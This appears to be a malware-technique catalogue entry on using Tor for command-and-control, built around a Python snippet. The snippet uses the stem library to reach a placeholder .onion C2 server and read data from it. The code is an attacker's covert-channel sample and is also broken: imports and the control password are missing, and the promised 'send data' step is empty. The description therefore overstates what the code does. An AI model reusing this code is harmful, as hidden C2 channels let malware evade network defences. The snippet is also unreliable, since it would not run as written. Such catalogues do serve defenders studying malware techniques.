Windows Python / Tor Network C2

Author Thomas Roccia (fr0gger)
Platform Windows
Language Python
Technique Tor Network C2


This code uses the stem library to connect to the Tor control port and authenticate with the control password. It then creates a new circuit to the specified C&C server and resolves its address using stem.util.connection.resolve_address(). The code then establishes a connection to the C&C server over the Tor network and sends and receives data from it.


import stem
import stem.connection
import stem.util.system

# Replace with the address of your C&C server
cc_server = "xyzabc123.onion"

# Connect to the Tor control port
control_socket = stem.socket.ControlPort(port = 9051)

# Authenticate with the Tor control port
stem.connection.authenticate_password(control_socket, control_password)

# Start a new circuit to the C&C server
circuit_id = stem.control.Controller.from_port(port = 9051).new_circuit(path = [], await_build = True)

# Resolve the C&C server's address
cc_server_ip = stem.util.connection.resolve_address(cc_server)

# Connect to the C&C server
cc_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cc_socket.connect((cc_server_ip, 80))

# Send data to the C&C server

# Receive data from the C&C server
data = cc_socket.recv(1024)


December 13, 2022

Last Revised

April 22, 2024